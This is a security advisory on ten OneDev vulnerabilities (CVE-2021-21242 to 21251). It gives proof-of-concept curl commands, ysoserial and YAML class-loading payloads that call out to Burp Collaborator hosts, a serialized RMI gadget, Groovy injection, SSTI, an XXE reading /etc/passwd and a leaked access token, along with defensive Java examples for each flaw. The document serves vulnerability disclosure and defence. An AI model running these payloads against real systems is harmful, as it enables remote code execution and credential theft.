OneDev: multiple high-severity vulnerabilities (CVE-2021-21242 through CVE-2021-21251)
CVE-2021-21242
CVE-2021-21243
CVE-2021-21244
CVE-2021-21245
CVE-2021-21246
CVE-2021-21247
CVE-2021-21248
CVE-2021-21249
CVE-2021-21250
CVE-2021-21251
1. Pre-auth insecure deserialization in AttachmentUploadServlet
PoC:
Use ysoserial's URLDNS gadget to generate a probe payload. The gadget sends a DNS request, which we can intercept to confirm that the deserialization succeeded.
curl -X POST http://localhost:6610/attachment_upload -H "File-Name: foo" -H "Attachment-Support: `java -jar /Users/pwntester/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://536mvpzmverok48wr06msp5du40uoj.burpcollaborator.net | base64`"
2. Pre-auth insecure deserialization in KubernetesResource
PoC:
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/allocate-job-caches
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/report-job-caches
3. Pre-auth SSTI via Bean Validation message manipulation
PoC:
${'test'.toUpperCase()} -> %24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/projects\?%24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d=bar
Caused by: org.glassfish.jersey.server.ContainerException: java.lang.NoSuchMethodError: javax.el.ELContext.notifyBeforeEvaluation(Ljava/lang/String;)
curl -X GET -H "Content-Type: application/json" https://code.onedev.io/rest/projects\?%24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d=bar
Unexpected query params: [TEST] (path = ProjectResource.query.<cross-parameter>, invalidValue = [null, null, null, org.glassfish.jersey.server.internal.routing.UriRoutingContext@5b27a361])
4. Pre-auth arbitrary file upload
// The attachment name is taken directly from the File-Name request header ...
String fileName = URLDecoder.decode(request.getHeader("File-Name"), StandardCharsets.UTF_8.name());
...
// ... and passed unchanged to the code that writes the file to disk.
String attachmentName = attachmentSuppport.saveAttachment(fileName, request.getInputStream());
5. Pre-auth access token leak
PoC:
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/users
Unauthorized access to user profiles
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/users/1
{
"id" : 1,
"name" : "admin",
"fullName" : "admin",
"ssoInfo" : {
"connector" : null,
"subject" : "4a155bff-715d-45e9-8898-4152bb97d25e"
},
"email" : "alvaro@pwntester.com",
"accessToken" : "JqnqWs6YsP8x3poNpnj6J6GFbvh0szli6lr5BWH8",
"userProjectQueries" : [ ],
"userIssueQueries" : [ ],
"userIssueQueryWatches" : { },
"issueQueryWatches" : { },
"userPullRequestQueries" : [ ],
"userPullRequestQueryWatches" : { },
"pullRequestQueryWatches" : { },
"userBuildQueries" : [ ],
"userBuildQuerySubscriptions" : [ ],
"buildQuerySubscriptions" : [ ]
}
6. Post-auth insecure deserialization in BasePage (AJAX)
PoC:
POST /projects/my-app/blob?7-1.IBehaviorListener.0- HTTP/1.1
Host: localhost:6610
Content-Length: 389
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax-BaseURL: projects/my-app/blob
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:6610
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:6610/projects/my-app/blob
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=node0cq7tdfxnza2v1nb58f7zwg7jj6.node0
Connection: close
data=rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3OAAKVW5pY2FzdFJlZgAPdG91Y2ggL3RtcC9mb29vAACFE//////C/CKmAAAAAAAAAAAAAAAAAAAAeA==
Authentication required.
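Items 1, 2 and 6 are all Java native deserialization of attacker-controlled bytes. The defensive counterpart, as an added example that is not OneDev's code and not from the advisory, is a deserialization allowlist via java.io.ObjectInputFilter (Java 9 and later): any class outside the listed packages is rejected before its readObject()/readResolve() code runs, which is what breaks gadget chains such as the URLDNS and RMI ones above. The class and pattern below are assumptions of this example.

```java
import java.io.*;
import java.util.HashMap;

// Deserializes only when every class in the stream matches an explicit allowlist.
public class FilteredDeserialization {

    // Reject anything outside java.lang/java.util, and cap depth and size so a
    // hostile stream cannot exhaust memory before the class check fires.
    private static final ObjectInputFilter ALLOWLIST =
        ObjectInputFilter.Config.createFilter(
            "maxdepth=10;maxbytes=65536;java.lang.*;java.util.*;!*");

    public static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(ALLOWLIST);   // must be set before the first readObject()
            return in.readObject();
        }
    }

    // Helper used only to build constructed sample streams for the demo below.
    static byte[] serialize(Serializable obj) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(obj);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        HashMap<String, Integer> ok = new HashMap<>();
        ok.put("jobs", 3);
        System.out.println("allowed: " + readFiltered(serialize(ok)));

        // A stream carrying a class outside the allowlist (here a harmless
        // BigDecimal standing in for a gadget class) is rejected at class
        // resolution, before any of that class's deserialization hooks execute.
        try {
            readFiltered(serialize(new java.math.BigDecimal("1.5")));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The filter should list only the types the endpoint legitimately expects; for the Kubernetes job-cache endpoints that would be the project's own DTO classes rather than java.util.*.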
7. Post-auth arbitrary code execution via Groovy script injection
PoC:
foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} //
8. Post-auth insecure YAML deserialization
version: 1
jobs:
- name: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://qgayzevwou8by0k3ochje4ebx23srh.burpcollaborator.net"]]]]
  image: asdasd
  commands:
  - asd
  retrieveSource: true
  cloneCredential: !DefaultCredential {}
  cpuRequirement: 250m
  memoryRequirement: 128m
  retryCondition: never
  maxRetries: 3
  retryDelay: 30
  timeout: 3600
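The build spec above is parsed by a YAML loader that honours `!!fully.qualified.Class` tags, so the document itself chooses which JVM classes get instantiated. As an added example (not OneDev's code, and assuming SnakeYAML 1.x, where SafeConstructor has a no-arg constructor), the same document loaded through SafeConstructor fails on the class tag instead of constructing the object; the sample documents are constructed for this example.

```java
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.ConstructorException;
import org.yaml.snakeyaml.constructor.SafeConstructor;

public class SafeYamlLoad {

    // Constructed sample modelled on the build spec above: the !! tag asks the
    // loader to instantiate an arbitrary class from the document.
    static final String HOSTILE =
        "version: 1\n" +
        "jobs:\n" +
        "- name: !!javax.script.ScriptEngineManager []\n" +
        "  image: asdasd\n";

    // Constructed benign sample with the same shape and no class tags.
    static final String BENIGN =
        "version: 1\n" +
        "jobs:\n" +
        "- name: build\n" +
        "  image: asdasd\n";

    // SafeConstructor only knows the standard YAML tags (maps, lists, scalars),
    // so any !! or ! class tag is a ConstructorException, not a constructor call.
    public static Object loadSafely(String yaml) {
        return new Yaml(new SafeConstructor()).load(yaml);
    }

    public static void main(String[] args) {
        System.out.println("benign: " + loadSafely(BENIGN));
        try {
            loadSafely(HOSTILE);
            System.out.println("hostile document loaded (should not happen)");
        } catch (ConstructorException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Application tags the spec legitimately needs, such as `!DefaultCredential` above, are then registered one by one with addTypeDescription on the constructor, so the set of instantiable classes is fixed by the application rather than by the document.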
9. Post-auth XML external entity expansion (XXE)
PoC:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
10. ZipSlip arbitrary file upload
import io.onedev.commons.utils.TarUtils;
import java.io.FileInputStream;
import java.io.File;

// Feeds an archive whose entry names contain "../" segments to TarUtils.untar;
// without a check on each entry name, entries are written outside ./dest.
public class UnTarTest {
    public static void main(String[] args) {
        try {
            FileInputStream is = new FileInputStream(new File("./zip-slip.tar"));
            TarUtils.untar(is, new File("./dest"));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
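Items 4 and 10 share one root cause: a name chosen by the client (the File-Name header, or a tar entry name) is joined to a server directory without checking that the result stays inside it. As an added example (not OneDev's TarUtils, and assuming Apache Commons Compress for tar reading), the helper below resolves and normalizes each untrusted name against the intended directory and rejects anything that escapes it, then applies that check to both cases.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import org.apache.commons.compress.archivers.tar.TarArchiveEntry;
import org.apache.commons.compress.archivers.tar.TarArchiveInputStream;

// Path-containment checks for the attachment name and for archive entries.
public class ContainedPaths {

    // Resolve an untrusted name under baseDir; absolute names and ".." segments
    // normalize to a path outside baseDir and are refused.
    public static Path resolveInside(Path baseDir, String untrusted) throws IOException {
        Path base = baseDir.toAbsolutePath().normalize();
        Path target = base.resolve(untrusted).normalize();
        if (target.equals(base) || !target.startsWith(base)) {
            throw new IOException("path escapes " + base + ": " + untrusted);
        }
        return target;
    }

    // Attachment names come from a request header: allow a single path segment only.
    public static Path attachmentPath(Path attachmentDir, String fileName) throws IOException {
        if (fileName == null || fileName.isEmpty() || fileName.contains("/")
                || fileName.contains("\\") || fileName.equals(".") || fileName.equals("..")) {
            throw new IOException("rejected attachment name: " + fileName);
        }
        return resolveInside(attachmentDir, fileName);
    }

    // Hardened untar: check every entry name before writing, and refuse link
    // entries, which could otherwise redirect a later entry outside dest.
    public static void untar(InputStream is, Path dest) throws IOException {
        try (TarArchiveInputStream tar = new TarArchiveInputStream(is)) {
            TarArchiveEntry entry;
            while ((entry = tar.getNextTarEntry()) != null) {
                if (entry.isSymbolicLink() || entry.isLink()) {
                    throw new IOException("link entries are not allowed: " + entry.getName());
                }
                Path target = resolveInside(dest, entry.getName());
                if (entry.isDirectory()) {
                    Files.createDirectories(target);
                } else {
                    Files.createDirectories(target.getParent());
                    Files.copy(tar, target, StandardCopyOption.REPLACE_EXISTING);
                }
            }
        }
    }
}
```

A zip-slip.tar like the one in the test above fails at resolveInside on its first "../" entry, before anything is written.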
Source: https://securitylab.github.com/advisories/GHSL-2020-214_223-onedev